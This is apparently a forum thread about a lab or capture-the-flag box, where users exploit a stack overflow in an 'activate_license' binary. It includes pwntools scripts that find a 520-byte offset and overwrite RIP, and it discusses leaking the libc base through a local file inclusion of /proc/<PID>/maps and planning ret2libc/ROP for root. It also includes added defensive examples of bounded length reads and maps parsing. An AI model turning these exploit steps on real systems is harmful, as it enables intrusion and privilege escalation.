Posts: 18 Threads: 0 Joined: N/A
Any pointers on how to get gdb to work with the binary? I just get "bad address" as soon as I try to send any data to the binary when it's connected to gdb, so if it's a BOF I can't see it.

Posts: 23 Threads: 0 Joined: N/A April 5, 2022 at 11:30 PM
(April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers on how to get gdb to work with the binary? [...]
You need to send the size in big endian 32 bit before; read the PHP file.

Posts: 71 Threads: 0 Joined: N/A April 6, 2022 at 10:48 PM
(April 5, 2022, 11:30 PM)mrfart Wrote: You need to send the size in big endian 32 bit before; read the PHP file.
This is likely what's messing with me. I get a BOF by sending 516 "A"s, so do we actually need to send it separately at all? If so, what are we sending? Calculate the size of the payload, send the size, then send the "license" payload?

(April 5, 2022, 06:19 PM)br_7801 Wrote: Any pointers on how to get gdb to work with the binary? [...]
If you've got a copy of the ELF and are using Python + pwntools:

./activate_license 1337

# Python
from pwn import *

r = remote('127.0.0.1', 1337)
gdb.attach(r)  # debug in gdb

That will pop a GDB window already attached, assuming the remote connection works. Then you set your breakpoints and go. Else, if not pwntools but plain Python:

./activate_license 1337

import socket
import subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 1337))  # connect() takes a single (host, port) tuple
# gdb.attach() is a pwntools helper, so in plain Python attach gdb to the listening
# process by PID instead (the same as running "gdb -p <pid>" in a second terminal)
pid = subprocess.check_output(['pidof', 'activate_license']).split()[0].decode()
subprocess.run(['gdb', '-p', pid])  # debug in gdb
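The framing mrfart is pointing at, as an added example (not code from the thread or from the challenge): the client side writes a 4-byte big-endian length and then the license bytes, exactly like pack("N") in the PHP, and the receiver side shows the bound check against a fixed buffer that a safe reader needs. The 512-byte capacity is the figure the thread works from; the function names are assumptions of this example.

```python
import io
import struct

LICENSE_BUF_SIZE = 512  # capacity of the receiver's fixed buffer (figure taken from the thread)


def frame_license(license_bytes: bytes) -> bytes:
    """Frame a license as activate_license.php does: pack("N", len) followed by the bytes."""
    if len(license_bytes) > 0xFFFFFFFF:
        raise ValueError("license too large for a 32-bit length prefix")
    return struct.pack(">I", len(license_bytes)) + license_bytes  # ">I" == PHP pack("N")


def read_license(stream, capacity: int = LICENSE_BUF_SIZE) -> bytes:
    """Read one framed license, refusing any announced length that would not fit.

    Reading the announced length straight into a fixed-size buffer, with no
    comparison against its capacity, is the defect the thread is exploiting;
    the comparison below is the missing check.
    """
    header = stream.read(4)
    if len(header) != 4:
        raise ValueError("short read on length prefix")
    (announced,) = struct.unpack(">I", header)  # unsigned 32-bit, big-endian byte order
    if announced > capacity:
        raise ValueError(f"announced length {announced} exceeds buffer capacity {capacity}")
    body = stream.read(announced)
    if len(body) != announced:
        raise ValueError("short read on license body")
    return body


def demo():
    """Constructed inputs: a normal frame, a frame that exactly fills the buffer,
    and a frame announcing 800 bytes for a 512-byte buffer (the thread's PoC framing)."""
    good = frame_license(b"LICENSE-" + b"x" * 100)
    boundary = frame_license(b"B" * LICENSE_BUF_SIZE)
    oversized = struct.pack(">I", 800) + b"A" * 800
    ok = read_license(io.BytesIO(good))
    boundary_ok = read_license(io.BytesIO(boundary)) == b"B" * LICENSE_BUF_SIZE
    try:
        read_license(io.BytesIO(oversized))
        rejected = False
    except ValueError:
        rejected = True
    return ok, boundary_ok, rejected


if __name__ == "__main__":
    body, boundary_ok, rejected = demo()
    print(len(body), boundary_ok, rejected)
```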
Posts: 23 Threads: 0 Joined: N/A April 6, 2022 at 11:14 PM
(April 6, 2022, 10:48 PM)skyweasel Wrote: [...] If you've got a copy of the ELF and are using Python + pwntools: [...]
I'm still working on this part, but I could overwrite the RIP. If you pay attention to these lines in activate_license.php:

socket_write($socket, pack("N", $license_size));
socket_write($socket, $license);

This is what is sent to the binary. It is packing the license size; you can see the reference here: https://www.w3schools.com/php/func_misc_pack.asp
"N - unsigned long (always 32 bit, big endian byte order)"
And then sending the content of the file. So how to find the offset?

from pwn import *

io = remote('127.0.0.1', 1337)

offset = 800  # Don't know the offset yet, let's start with a big number
size = p32(offset, endian='big')  # We need to pack it as 32-bit big endian

payload = [
    size,
    cyclic(1000)  # Create a 1000-character pattern
]
payload = b"".join(payload)

io.send(payload)
io.interactive()

I set the license_size (the offset variable in the script) bigger than 512 bytes so the binary reads more than it should. Running this script you can get the 520 bytes of offset before the buffer overflow.

pwndbg> x/xw $rsp
0x7fffffffdd18: 0x66616166

$ python2 -c 'from pwn import *; print cyclic_find(unhex("66616166")[::-1])'
520

What I did was, starting the binary using GDB and running this Python script, we can overwrite the RIP with "0xd34dc0d3" for example:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Usage: python3 poc.py [DEBUG]
from pwn import *

context.arch = 'amd64'
context.os = 'linux'
context.endian = 'little'
context.word_size = 64

offset = 800
size = p32(offset, endian='big')

payload = b''
payload += size
payload += b'A' * 520
payload += p64(0xd34dc0d3)

r = remote('localhost', 1337)
r.sendline(payload)
r.sendline()

From here we can set the RIP to any address we want; however, the addresses are all offsets, so we need to leak some function or variable address to calculate the base address. Then we can use the leaked address with the offsets to point the RIP anywhere we want. I thought of trying a ret2libc, downloaded the libc used in the binary and now I'm stuck... :(

Posts: 71 Threads: 0 Joined: N/A April 7, 2022 at 12:38 AM
(April 6, 2022, 11:14 PM)mrfart Wrote: [...]
From here we can set the RIP to any address we want; however, the addresses are all offsets, so we need to leak some function or variable address to calculate the base address. Then we can use the leaked address with the offsets to point the RIP anywhere we want. I thought of trying a ret2libc, downloaded the libc used in the binary and now I'm stuck... :(

Nice one, well we can actually get the base address of libc using the LFI, grabbing and analysing /proc/<PID>/maps. I get:

<snip>
7f1f287d9000-7f1f287fe000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f287fe000-7f1f28949000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28949000-7f1f28993000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28993000-7f1f28994000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28994000-7f1f28997000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28997000-7f1f2899a000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
<snip>
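Turning mapping lines like the ones above into a base address, as an added example that is not code from the thread: the parser reads /proc/<pid>/maps text (the six libc lines quoted above are embedded as the sample, <snip> markers included) and picks the libc mapping at file offset 0, which is the load base that the binary's own offsets are relative to. The function names are assumptions of this example.

```python
import re

# Sample in /proc/<pid>/maps format, copied from the post above; the <snip>
# lines stand for the entries the poster left out and must be skipped.
SAMPLE_MAPS = """\
<snip>
7f1f287d9000-7f1f287fe000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f287fe000-7f1f28949000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28949000-7f1f28993000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28993000-7f1f28994000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28994000-7f1f28997000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f1f28997000-7f1f2899a000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
<snip>
"""

# start-end perms file-offset dev inode [path]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S{4})\s+(?P<offset>[0-9a-f]+)"
    r"\s+\S+\s+\d+\s*(?P<path>\S*)$"
)


def parse_maps(text):
    """Parse maps text into dicts with integer start/end/offset; non-mapping lines are skipped."""
    mappings = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        mappings.append({"start": int(d["start"], 16), "end": int(d["end"], 16),
                         "perms": d["perms"], "offset": int(d["offset"], 16), "path": d["path"]})
    return mappings


def library_base(mappings, name_fragment):
    """Load base of a shared object: the mapping of that file whose file offset is 0.

    Keying on offset 0 rather than on the lowest address is what makes the rule
    hold when only some of the library's segments are present in the text."""
    cands = [m for m in mappings if name_fragment in m["path"] and m["offset"] == 0]
    return min(c["start"] for c in cands) if cands else None


def executable_range(mappings, name_fragment):
    """Start and end of the library's r-x segment, where its code lives."""
    for m in mappings:
        if name_fragment in m["path"] and "x" in m["perms"]:
            return m["start"], m["end"]
    return None
```

Applied to a full maps file the same functions give the PIE base of the main executable too, since its offset-0 mapping is the first entry for that path.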
Posts: 71 Threads: 0 Joined: N/A
(April 7, 2022, 12:38 AM)skyweasel Wrote: [...] Nice one, well we can actually get the base address of libc using the LFI, grabbing and analysing /proc/<PID>/maps [...]
I'm having trouble getting that version of libc to work; did you manage to grab a copy and have it run?

Posts: 32 Threads: 0 Joined: N/A
The stack overflow vulnerability is quite simple; the difficult part is how to build the ROP chain.

Posts: 71 Threads: 0 Joined: N/A
(April 7, 2022, 03:07 AM)F4nny Wrote: The stack overflow vulnerability is quite simple; the difficult part is how to build the ROP chain.
Agreed, the SOF is the easy bit.
Care to share the targeted ROP steps?
Can't even get a patched version working on my rig to match the libc version used on the box :/

Posts: 32 Threads: 0 Joined: N/A
(April 7, 2022, 03:41 AM)skyweasel Wrote: Agreed, the SOF is the easy bit. Care to share the targeted ROP steps? [...]
Stuck there for a while XD

Posts: 49 Threads: 0 Joined: N/A
Try to run some binary exploit where you can get root from that technique.